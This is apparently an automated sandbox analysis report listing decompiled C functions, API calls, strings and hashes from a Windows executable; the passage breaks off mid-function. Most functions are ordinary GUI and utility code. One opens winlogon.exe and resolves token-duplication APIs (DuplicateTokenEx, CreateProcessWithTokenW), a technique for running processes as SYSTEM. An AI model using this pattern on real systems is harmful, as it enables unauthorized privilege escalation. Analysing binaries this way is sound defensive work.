Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x0040314a
0x00403151
0x00403158
0x0040315a
0x00403162
0x00403166
0x00403190
0x00403190
0x00403198
0x00403199
0x0040319e
0x004031bb
0x004031a0
0x004031ad
0x004031b6
0x004031b6
0x0040319e
0x0040316e
0x00403176
0x0040317c
0x0040317f
0x0040317f
0x00403182
0x0040318a
0x00000000
0x0040318c
0x0040318c
0x00000000
0x0040318c

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

InitCommonControlsEx, xrefs: 00403168
Error, xrefs: 004031A2
Error: Cannot load the common control classes., xrefs: 004031A7
comctl32.dll, xrefs: 00403145

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

0x00404da9
0x00404dbc
0x00404dbf
0x00404dc6
0x00404dcc
0x00404dce
0x00404de1
0x00404deb
0x00404df2
0x00404df4
0x00404df4
0x00404e07
0x00404e0d
0x00404e18
0x00404e1c
0x00404e1e
0x00404e27
0x00404e28
0x00404e29
0x00404e2f
0x00404e31
0x00404e37
0x00404e41
0x00404e42
0x00404e43
0x00404e46
0x00404e46
0x00404e1c
0x00404e4d
0x00404e50
0x00404e5f
0x00404e66
0x00404e52
0x00404e52
0x00404e52
0x00404e6d
0x00404e70
0x00404e85
0x00404e85
0x00000000
0x00404e72
0x00404e7b
0x00404e80
0x00404e83
0x00404e87
0x00404e89
0x00404e8b
0x00404e8b
0x00404ea8
0x00404ea8
0x00000000
0x00404e83

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

TranslatorURL, xrefs: 0040640B
general, xrefs: 004063B7
rtl, xrefs: 004063CD
TranslatorName, xrefs: 004063F7
charset, xrefs: 004063E1

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040adf6
0x0040adf8
0x0040adfa
0x0040adfb
0x0040adfb
0x0040ae02
0x00000000
0x00000000
0x0040ae04
0x0040ae05
0x0040ae6d
0x0040ae6e
0x0040ae73
0x0040ae76
0x0040ae7f
0x0040ae83
0x0040ae86
0x00000000
0x0040ae86
0x0040ae8f
0x0040ae0c
0x0040ae10
0x0040ae1e
0x0040ae3b
0x0040ae4a
0x0040ae65
0x0040ae7a
0x0040ae7e
0x0040ae67
0x0040ae67
0x0040ae68
0x00000000
0x0040ae68
0x0040ae4c
0x0040ae4c
0x0040ae4e
0x00000000
0x0040ae4e
0x0040ae3d
0x0040ae3d
0x0040ae3f
0x0040ae53
0x0040ae54
0x0040ae59
0x0040ae5c
0x0040ae5c
0x0040ae20
0x0040ae28
0x0040ae2d
0x0040ae30
0x0040ae30
0x0040ae12
0x0040ae12
0x0040ae13
0x00000000
0x0040ae13
0x00000000
0x0040ae10

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

<, xrefs: 0040AE05
>, xrefs: 0040AE13
°, xrefs: 0040AE3F
&, xrefs: 0040AE4E
", xrefs: 0040AE22
<br>, xrefs: 0040AE68

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

0x004041f9
0x00404205
0x00404208
0x00404217
0x0040421e
0x00404236
0x0040423f
0x0040424a
0x0040425f
0x0040426b
0x0040426e
0x0040426e
0x00404275
0x004043be
0x004043ce
0x004043d0
0x004043d3
0x004043da
0x004043da
0x004043c0
0x004043c3
0x004043c3
0x0040427b
0x0040428c
0x0040428f
0x00404295
0x004042a5
0x004042b8
0x004042cb
0x004042de
0x004042f1
0x00404304
0x00404317
0x0040432a
0x0040433d
0x00404350
0x00404363
0x00404376
0x00404389
0x0040439c
0x004043a4
0x004043af
0x004043b5
0x004043b5
0x004043f5

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

0x00405b81
0x00405b88
0x00405b8a
0x00405b8a
0x00405b8f
0x00405b96
0x00405b9b
0x00405bad
0x00405bad
0x00405b9d
0x00405b9d
0x00405ba8
0x00405bab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bab
0x00405be9
0x00405be9
0x00405baf
0x00405bb1
0x00405ce2
0x00405ce2
0x00405bb7
0x00405bbd
0x00405bf6
0x00405c4b
0x00405c4c
0x00405c52
0x00405c53
0x00000000
0x00405bf8
0x00405c02
0x00405c0e
0x00405c13
0x00405c18
0x00405c2c
0x00405c2e
0x00405c3b
0x00405c3c
0x00405c42
0x00000000
0x00405c1a
0x00405c25
0x00405c2a
0x00000000
0x00000000
0x00405c2a
0x00405c18
0x00405bbf
0x00405bc0
0x00405bcd
0x00405bce
0x00405bd7
0x00405c58
0x00405c5f
0x00405c61
0x00405c61
0x00405c63
0x00405cdb
0x00405cdb
0x00405c65
0x00405c65
0x00405c74
0x00000000
0x00405c84
0x00405c8a
0x00405c8d
0x00405c99
0x00405caf
0x00405cbd
0x00405cc8
0x00405cd4
0x00405cd9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cd9
0x00405c74
0x00405c63
0x00405ce6

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

0x00401e59
0x00401e5c
0x00401e64
0x00401e67
0x00401ef9
0x00401e6d
0x00401e70
0x00401e76
0x00401e79
0x00401e7e
0x00401e83
0x00401e92
0x00401e85
0x00401e8e
0x00401e8e
0x00401e96
0x00401ee6
0x00401e98
0x00401e9b
0x00401e9e
0x00401ea3
0x00401ea8
0x00401ebb
0x00401eaa
0x00401eb7
0x00401eb7
0x00401ebf
0x00401ed3
0x00401ec1
0x00401ec7
0x00401ec9
0x00401ec9
0x00401ed8
0x00401ed8
0x00401eeb
0x00401eeb
0x00401f01

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
